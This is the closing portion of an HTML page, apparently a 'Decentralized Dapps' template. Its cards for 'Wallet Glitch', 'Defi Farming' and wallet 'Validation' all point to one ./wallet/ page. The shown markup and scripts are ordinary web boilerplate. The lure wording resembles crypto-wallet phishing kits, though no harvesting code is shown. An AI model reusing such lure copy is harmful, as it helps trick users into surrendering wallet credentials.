                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Wallet Glitch</h5>
                      <p>Click here if you have problem with your trading wallet</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Defi Farming</h5>
                      <p>Click here for defi farming / commercial farming issues</p>
                    </div>
                  </a>
                </div>
                <div class="col-xl-3 col-md-6">
                  <a href="./wallet/index.html" class= syncBtn">
                    <div class="speciality-box aos-init" data-aos="fade-up" data-aos-duration="2000">
                      <h5 class="title">Validation</h5>
                      <p>Click here to validate your wallet using multisig</p>
                    </div>
                  </a>
                </div>
              </div>
            </div>
          </section>
          <footer class="footer">
            <div class="shape"></div>
            <div class="container">
              <div class="row">
                <div class="col-md-12">
                  <div class="footer__bottom">
                    <div class="center mb--30">
                      <ul class="list">
                        <li>
                          <a href="#">Privacy Policy</a>
                        </li>
                        <li>
                          <a href="#">Term &amp; Conditions</a>
                        </li>
                      </ul>
                      <p>© 2023, Decentralized Dapps</p>
                    </div>
                    <ul class="list-social">
                      <li>
                        <a href="#">
                          <svg width="9" height="16" viewBox="0 0 9 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M2.57969 9.03953C2.51969 9.03953 1.19969 9.03953 0.599688 9.03953C0.279688 9.03953 0.179688 8.91953 0.179688 8.61953C0.179688 7.81953 0.179688 6.99953 0.179688 6.19953C0.179688 5.87953 0.299688 5.77953 0.599688 5.77953H2.57969C2.57969 5.71953 2.57969 4.55953 2.57969 4.01953C2.57969 3.21953 2.71969 2.45953 3.11969 1.75953C3.53969 1.03953 4.13969 0.559531 4.89969 0.279531C5.39969 0.0995311 5.89969 0.0195312 6.43969 0.0195312H8.39969C8.67969 0.0195312 8.79969 0.139531 8.79969 0.419531V2.69953C8.79969 2.97953 8.67969 3.09953 8.39969 3.09953C7.85969 3.09953 7.31969 3.09953 6.77969 3.11953C6.23969 3.11953 5.95969 3.37953 5.95969 3.93953C5.93969 4.53953 5.95969 5.11953 5.95969 5.73953H8.27969C8.59969 5.73953 8.71969 5.85953 8.71969 6.17953V8.59953C8.71969 8.91953 8.61969 9.01953 8.27969 9.01953C7.55969 9.01953 6.01969 9.01953 5.95969 9.01953V15.5395C5.95969 15.8795 5.85969 15.9995 5.49969 15.9995C4.65969 15.9995 3.83969 15.9995 2.99969 15.9995C2.69969 15.9995 2.57969 15.8795 2.57969 15.5795C2.57969 13.4795 2.57969 9.09953 2.57969 9.03953Z" fill="white"></path>
                          </svg>
                        </a>
                      </li>
                      <li>
                        <a href="#">
                          <svg width="15" height="12" viewBox="0 0 15 12" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M14.5 1.42062C13.9794 1.66154 13.4246 1.82123 12.8462 1.89877C13.4412 1.524 13.8954 0.935077 14.1089 0.225231C13.5541 0.574154 12.9416 0.820615 12.2889 0.958154C11.7621 0.366462 11.0114 0 10.1924 0C8.60337 0 7.32412 1.36062 7.32412 3.02862C7.32412 3.26862 7.34338 3.49938 7.39062 3.71908C5.0045 3.59631 2.89313 2.38985 1.47475 0.552C1.22712 1.00523 1.08188 1.524 1.08188 2.08246C1.08188 3.13108 1.59375 4.06062 2.35675 4.59877C1.89562 4.58954 1.44325 4.44831 1.06 4.22585C1.06 4.23508 1.06 4.24708 1.06 4.25908C1.06 5.73046 2.05487 6.95262 3.3595 7.23415C3.12587 7.30154 2.87125 7.33385 2.607 7.33385C2.42325 7.33385 2.23775 7.32277 2.06362 7.28215C2.4355 8.48123 3.49075 9.36277 4.7455 9.39138C3.769 10.1972 2.52912 10.6828 1.18688 10.6828C0.9515 10.6828 0.72575 10.6717 0.5 10.6412C1.77137 11.5062 3.27813 12 4.903 12C10.1845 12 13.072 7.38462 13.072 3.384C13.072 3.25015 13.0676 3.12092 13.0615 2.99262C13.6311 2.56615 14.1097 2.03354 14.5 1.42062Z" fill="white"></path>
                          </svg>
                        </a>
                      </li>
                      <li>
                        <a href="#">
                          <svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M14.0006 14V8.87249C14.0006 6.35249 13.4581 4.42749 10.5181 4.42749C9.10062 4.42749 8.15563 5.19749 7.77063 5.93249H7.73563V4.65499H4.95312V14H7.85813V9.36249C7.85813 8.13749 8.08563 6.96499 9.59063 6.96499C11.0781 6.96499 11.0956 8.34749 11.0956 9.43249V13.9825H14.0006V14Z" fill="white"></path>
                            <path d="M0.226562 4.65479H3.13156V13.9998H0.226562V4.65479Z" fill="white"></path>
                            <path d="M1.68 0C0.7525 0 0 0.7525 0 1.68C0 2.6075 0.7525 3.3775 1.68 3.3775C2.6075 3.3775 3.36 2.6075 3.36 1.68C3.36 0.7525 2.6075 0 1.68 0Z" fill="white"></path>
                          </svg>
                        </a>
                      </li>
                      <li>
                        <a href="#">
                          <svg width="18" height="12" viewBox="0 0 18 12" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M17.2347 1.9639C17.1458 1.22216 16.4468 0.510897 15.7154 0.415609C11.2555 -0.138536 6.7457 -0.138536 2.28731 0.415609C1.55533 0.51069 0.856308 1.22216 0.76739 1.9639C0.452537 4.68236 0.452537 7.31818 0.76739 10.036C0.856308 10.7778 1.55533 11.4897 2.28731 11.5843C6.7457 12.1384 11.2557 12.1384 15.7154 11.5843C16.4468 11.4898 17.1458 10.7778 17.2347 10.036C17.5496 7.31842 17.5496 4.68236 17.2347 1.9639ZM7.58931 8.82375V3.17703L11.8243 6.00049L7.58931 8.82375Z" fill="white"></path>
                          </svg>
                        </a>
                      </li>
                    </ul>
                  </div>
                </div>
              </div>
            </div>
          </footer>
        </div>
      </div>
    </div>
    <script>
      ! function(l) {
        function e(e) {
          for (var r, t, n = e[0], o = e[1], u = e[2], f = 0, i = []; f < n.length; f++) t = n[f], p[t] && i.push(p[t][0]), p[t] = 0;
          for (r in o) Object.prototype.hasOwnProperty.call(o, r) && (l[r] = o[r]);
          for (s && s(e); i.length;) i.shift()();
          return c.push.apply(c, u || []), a()
        }

        function a() {
          for (var e, r = 0; r < c.length; r++) {
            for (var t = c[r], n = !0, o = 1; o < t.length; o++) {
              var u = t[o];
              0 !== p[u] && (n = !1)
            }
            n && (c.splice(r--, 1), e = f(f.s = t[0]))
          }
          return e
        }
        var t = {},
          p = {
            1: 0
          },
          c = [];

        function f(e) {
          if (t[e]) return t[e].exports;
          var r = t[e] = {
            i: e,
            l: !1,
            exports: {}
          };
          return l[e].call(r.exports, r, r.exports, f), r.l = !0, r.exports
        }
        f.m = l, f.c = t, f.d = function(e, r, t) {
          f.o(e, r) || Object.defineProperty(e, r, {
            enumerable: !0,
            get: t
          })
        }, f.r = function(e) {
          "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
            value: "Module"
          }), Object.defineProperty(e, "__esModule", {
            value: !0
          })
        }, f.t = function(r, e) {
          if (1 & e && (r = f(r)), 8 & e) return r;
          if (4 & e && "object" == typeof r && r && r.__esModule) return r;
          var t = Object.create(null);
          if (f.r(t), Object.defineProperty(t, "default", {
              enumerable: !0,
              value: r
            }), 2 & e && "string" != typeof r)
            for (var n in r) f.d(t, n, function(e) {
              return r[e]
            }.bind(null, n));
          return t
        }, f.n = function(e) {
          var r = e && e.__esModule ? function() {
            return e.default
          } : function() {
            return e
          };
          return f.d(r, "a", r), r
        }, f.o = function(e, r) {
          return Object.prototype.hasOwnProperty.call(e, r)
        }, f.p = "index.html";
        var r = window.webpackJsonp = window.webpackJsonp || [],
          n = r.push.bind(r);
        r.push = e, r = r.slice();
        for (var o = 0; o < r.length; o++) e(r[o]);
        var s = n;
        a()
      }([])
    </script>
    <script src="static/js/2.532fe077.chunk.js"></script>
    <script src="static/js/main.0bd736dd.chunk.js"></script>

    <div id="f0c3f38">
      <div></div>
    </div>
  </body>
</html>